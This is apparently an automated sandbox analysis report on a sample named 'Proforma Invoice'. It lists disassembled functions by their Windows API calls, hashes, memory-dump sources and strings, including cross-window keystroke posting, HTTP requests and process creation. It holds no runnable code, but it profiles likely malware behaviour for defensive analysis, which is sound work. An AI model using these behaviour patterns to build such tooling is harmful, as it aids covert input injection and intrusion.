                                                                                                • Opcode ID: 37cf43e85c493fa91e67b9b0b5b9c3fac4940e14a5945d2c2f7de318de654411
                                                                                                • Instruction ID: 08ebce7923c762e861c5e2cc4b8deb5692b8abd7015921d7e9459252cc0b7cd9
                                                                                                • Opcode Fuzzy Hash: 37cf43e85c493fa91e67b9b0b5b9c3fac4940e14a5945d2c2f7de318de654411
                                                                                                • Instruction Fuzzy Hash: D0B16A71D0420ADFEB14DFA4C884BBEB7F9EF09321F244529E601E7281D778A941CBA0
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 007011F0
                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00700268,?,00000001), ref: 00701204
                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0070120B
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00700268,?,00000001), ref: 0070121A
                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0070122C
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00700268,?,00000001), ref: 00701245
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00700268,?,00000001), ref: 00701257
                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00700268,?,00000001), ref: 0070129C
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00700268,?,00000001), ref: 007012B1
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00700268,?,00000001), ref: 007012BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                • String ID:
                                                                                                • API String ID: 2156557900-0
                                                                                                • Opcode ID: 6eaaeee9b118c7fc4d179b1bc29f4bce6f394fef17c9159025eabea1c5fdb805
                                                                                                • Instruction ID: 19d1e4b988e35e8f233445213211588b78ce1a36dcd8e50f51dc80055ad5054f
                                                                                                • Opcode Fuzzy Hash: 6eaaeee9b118c7fc4d179b1bc29f4bce6f394fef17c9159025eabea1c5fdb805
                                                                                                • Instruction Fuzzy Hash: D1316975600304FBDB20EB54ED98BA977F9FB58311F918229F901C62E0D7BC9D408B68
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006AFAA6
                                                                                                • OleUninitialize.OLE32(?,00000000), ref: 006AFB45
                                                                                                • UnregisterHotKey.USER32(?), ref: 006AFC9C
                                                                                                • DestroyWindow.USER32(?), ref: 006E45D6
                                                                                                • FreeLibrary.KERNEL32(?), ref: 006E463B
                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006E4668
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                • String ID: close all
                                                                                                • API String ID: 469580280-3243417748
                                                                                                • Opcode ID: 481fec68a31ee551e0f266128a6f50a05a926edb81952fe4b693d7cc5292824a
                                                                                                • Instruction ID: 9f6ac9332b630cb6fb7a4bc277490ae001b1e18efcefe67d34fe003ae8136256
                                                                                                • Opcode Fuzzy Hash: 481fec68a31ee551e0f266128a6f50a05a926edb81952fe4b693d7cc5292824a
                                                                                                • Instruction Fuzzy Hash: 87A17070702212CFDB28EF65C594AA9F366BF06710F5042ADE90AAB261DF30ED16CF55
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit$_memset
                                                                                                • String ID: ,,s$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                • API String ID: 2862541840-1757569584
                                                                                                • Opcode ID: 57f3078d85607d5b95bd4977ef456013b99bf7dbc26de90e66b56286acee4108
                                                                                                • Instruction ID: f61497b547bd17881f08b65085477b5a0e8fe45a8be86fb336ad52a9dad9c222
                                                                                                • Opcode Fuzzy Hash: 57f3078d85607d5b95bd4977ef456013b99bf7dbc26de90e66b56286acee4108
                                                                                                • Instruction Fuzzy Hash: B9918171900219ABDF24DF99C858FEEB7B8EF45710F108519F615AB2C0D7789986CFA0
                                                                                                APIs
                                                                                                • EnumChildWindows.USER32(?,006FA439), ref: 006FA377
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ChildEnumWindows
                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                • API String ID: 3555792229-1603158881
                                                                                                • Opcode ID: 06b56266248377394b136287936f38f965bb4e7be3ec995be71ee255e3931595
                                                                                                • Instruction ID: 12aca5e66e8c98b713acb16bc22f73d8bb332219ee44dca17356f738204e332f
                                                                                                • Opcode Fuzzy Hash: 06b56266248377394b136287936f38f965bb4e7be3ec995be71ee255e3931595
                                                                                                • Instruction Fuzzy Hash: 9191A271604609AADB48EFE0C482BFDFBB6FF04300F54812DD95DA7241DB316A99CBA5
                                                                                                APIs
                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 006A2EAE
                                                                                                  • Part of subcall function 006A1DB3: GetClientRect.USER32(?,?), ref: 006A1DDC
                                                                                                  • Part of subcall function 006A1DB3: GetWindowRect.USER32(?,?), ref: 006A1E1D
                                                                                                  • Part of subcall function 006A1DB3: ScreenToClient.USER32(?,?), ref: 006A1E45
                                                                                                • GetDC.USER32 ref: 006DCD32
                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006DCD45
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 006DCD53
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 006DCD68
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 006DCD70
                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006DCDFB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                • String ID: U
                                                                                                • API String ID: 4009187628-3372436214
                                                                                                • Opcode ID: 4c747783bb2f7a2263881f4633acbe8b5b203d7174a7198040ece5be5245291d
                                                                                                • Instruction ID: 12f6abe9ac98ae603eea3349ad06e4c5c6df42a0cc95cab5a968d93750898195
                                                                                                • Opcode Fuzzy Hash: 4c747783bb2f7a2263881f4633acbe8b5b203d7174a7198040ece5be5245291d
                                                                                                • Instruction Fuzzy Hash: 58714B3190020ADFCF219F64C894AEA7BB7FF49320F14426AE9559A3A6C7359C91DF60
                                                                                                APIs
                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00711A50
                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00711A7C
                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00711ABE
                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00711AD3
                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00711AE0
                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00711B10
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00711B57
                                                                                                  • Part of subcall function 00712483: GetLastError.KERNEL32(?,?,00711817,00000000,00000000,00000001), ref: 00712498
                                                                                                  • Part of subcall function 00712483: SetEvent.KERNEL32(?,?,00711817,00000000,00000000,00000001), ref: 007124AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                • String ID:
                                                                                                • API String ID: 2603140658-3916222277
                                                                                                • Opcode ID: c67ad3055fc553c1fc129fc3681d198721eeaeb857f504e66769cf6903564d45
                                                                                                • Instruction ID: f4351fd623c910f964a98ab8298fe030a9246ff4973a83f40de70671b3f7f647
                                                                                                • Opcode Fuzzy Hash: c67ad3055fc553c1fc129fc3681d198721eeaeb857f504e66769cf6903564d45
                                                                                                • Instruction Fuzzy Hash: 784186B1501218BFEB118F54CC89FFB7B6CEF08754F408126FA059A181E7789E859BA4
                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0072F910), ref: 00718D28
                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0072F910), ref: 00718D5C
                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00718ED6
                                                                                                • SysFreeString.OLEAUT32(?), ref: 00718F00
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                • String ID:
                                                                                                • API String ID: 560350794-0
                                                                                                • Opcode ID: f085d8d49344693b356832d43cc79a85fd665941a9f85d77ca9aa5585574aed7
                                                                                                • Instruction ID: 7a352a38cce14c3fb64650eec8bac08c691173128e97583877353c919490bdce
                                                                                                • Opcode Fuzzy Hash: f085d8d49344693b356832d43cc79a85fd665941a9f85d77ca9aa5585574aed7
                                                                                                • Instruction Fuzzy Hash: 5EF12B71A00109EFCB54DF98C884EEEB7B9FF49314F108598F505AB291DB35AE86CB61
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0071F6B5
                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0071F848
                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0071F86C
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0071F8AC
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0071F8CE
                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0071FA4A
                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0071FA7C
                                                                                                • CloseHandle.KERNEL32(?), ref: 0071FAAB
                                                                                                • CloseHandle.KERNEL32(?), ref: 0071FB22
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                • String ID:
                                                                                                • API String ID: 4090791747-0
                                                                                                • Opcode ID: 0610d69a9c8d365d0c4ec57f46660d8e3a41dbc054e3dd30b8780a621491ad53
                                                                                                • Instruction ID: 71e452c26904baa187991e590030e293c9ddcf816940b5103c6a2c54889a6914
                                                                                                • Opcode Fuzzy Hash: 0610d69a9c8d365d0c4ec57f46660d8e3a41dbc054e3dd30b8780a621491ad53
                                                                                                • Instruction Fuzzy Hash: 07E19F716043019FC754EF28C891BAABBE1EF85354F14896DF8859B2E2CB35EC81CB56
                                                                                                APIs
                                                                                                  • Part of subcall function 0070466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00703697,?), ref: 0070468B
                                                                                                  • Part of subcall function 0070466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00703697,?), ref: 007046A4
                                                                                                  • Part of subcall function 00704A31: GetFileAttributesW.KERNEL32(?,0070370B), ref: 00704A32
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00704D40
                                                                                                • _wcscmp.LIBCMT ref: 00704D5A
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00704D75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 793581249-0
                                                                                                • Opcode ID: 9f59f4f37f3b9f8196fe88f2a726ef1d55d195c5fe0b9fd620fad02a14a5aa2c
                                                                                                • Instruction ID: 281674e27f6194744565591384bcf93f522564abe3a0fdb0d6efa58490229526
                                                                                                • Opcode Fuzzy Hash: 9f59f4f37f3b9f8196fe88f2a726ef1d55d195c5fe0b9fd620fad02a14a5aa2c
                                                                                                • Instruction Fuzzy Hash: 0C5166B2108385DBC764EB90D885DDFB3ECAF85350F004A2EF685D3191EE35A588CB5A
                                                                                                APIs
                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007286FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: InvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 634782764-0
                                                                                                • Opcode ID: fa7323689733daf7fb76b4eac4a859424e8730f247165d46874fa10f9f505596
                                                                                                • Instruction ID: 24a55aa09aae01cbf6adbb2af636dfef79498755ae5eff13da9a08cf16486259
                                                                                                • Opcode Fuzzy Hash: fa7323689733daf7fb76b4eac4a859424e8730f247165d46874fa10f9f505596
                                                                                                • Instruction Fuzzy Hash: F051B530502274BEDBA09F68EC89FAD3BB5EB05310F604125F911D62A1CF7FA940DB46
                                                                                                APIs
                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 006DC2F7
                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006DC319
                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006DC331
                                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 006DC34F
                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006DC370
                                                                                                • DestroyIcon.USER32(00000000), ref: 006DC37F
                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 006DC39C
                                                                                                • DestroyIcon.USER32(?), ref: 006DC3AB
                                                                                                  • Part of subcall function 0072A4AF: DeleteObject.GDI32(00000000), ref: 0072A4E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                                • String ID:
                                                                                                • API String ID: 2819616528-0
                                                                                                • Opcode ID: 333725f94dd9ed3f5c45eb72dfd92c70358a33142ca5a88bfab5967817529f90
                                                                                                • Instruction ID: 49f554148d9bd32d69797e0c6f91e6c39f27884678c720e98c9d02cdc874caf3
                                                                                                • Opcode Fuzzy Hash: 333725f94dd9ed3f5c45eb72dfd92c70358a33142ca5a88bfab5967817529f90
                                                                                                • Instruction Fuzzy Hash: 83515A70A4020AEFDB24EF68CC55FAA77B6EB19320F108529F90297390D774AD91DF60
                                                                                                APIs
                                                                                                  • Part of subcall function 006FA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006FA84C
                                                                                                  • Part of subcall function 006FA82C: GetCurrentThreadId.KERNEL32 ref: 006FA853
                                                                                                  • Part of subcall function 006FA82C: AttachThreadInput.USER32(00000000,?,006F9683,?,00000001), ref: 006FA85A
                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006F968E
                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006F96AB
                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006F96AE
                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006F96B7
                                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006F96D5
                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006F96D8
                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 006F96E1
                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006F96F8
                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006F96FB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2014098862-0
                                                                                                • Opcode ID: 96883866bf4111abeb72278e49ad2238999a7aa0dca41552b48f6b51735d08d4
                                                                                                • Instruction ID: 15c9afc9f16b1bb40160f6dfac6f9a53c8c949b72b68d41eb66997f048a2c108
                                                                                                • Opcode Fuzzy Hash: 96883866bf4111abeb72278e49ad2238999a7aa0dca41552b48f6b51735d08d4
                                                                                                • Instruction Fuzzy Hash: B611E5B191021CBEF6206F60DC49F7A3B2EDB4C791F504439F344AB0A0CAF25C11DAA8
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006F853C,00000B00,?,?), ref: 006F892A
                                                                                                • HeapAlloc.KERNEL32(00000000,?,006F853C,00000B00,?,?), ref: 006F8931
                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006F853C,00000B00,?,?), ref: 006F8946
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,006F853C,00000B00,?,?), ref: 006F894E
                                                                                                • DuplicateHandle.KERNEL32(00000000,?,006F853C,00000B00,?,?), ref: 006F8951
                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006F853C,00000B00,?,?), ref: 006F8961
                                                                                                • GetCurrentProcess.KERNEL32(006F853C,00000000,?,006F853C,00000B00,?,?), ref: 006F8969
                                                                                                • DuplicateHandle.KERNEL32(00000000,?,006F853C,00000B00,?,?), ref: 006F896C
                                                                                                • CreateThread.KERNEL32(00000000,00000000,006F8992,00000000,00000000,00000000), ref: 006F8986
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 1957940570-0
                                                                                                • Opcode ID: 49ba4882e335a8961f31b1365e2e32888301725e98f735978bc96cb4890af983
                                                                                                • Instruction ID: 80a8e164774da68f4e24666bf9776fc084840191f6f7492bb967d4a069b20352
                                                                                                • Opcode Fuzzy Hash: 49ba4882e335a8961f31b1365e2e32888301725e98f735978bc96cb4890af983
                                                                                                • Instruction Fuzzy Hash: 3401BBB5640308FFE720ABA5DD4EF6B3BACEB89711F418425FA05DB1A1CA749C11CB24
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                • API String ID: 0-572801152
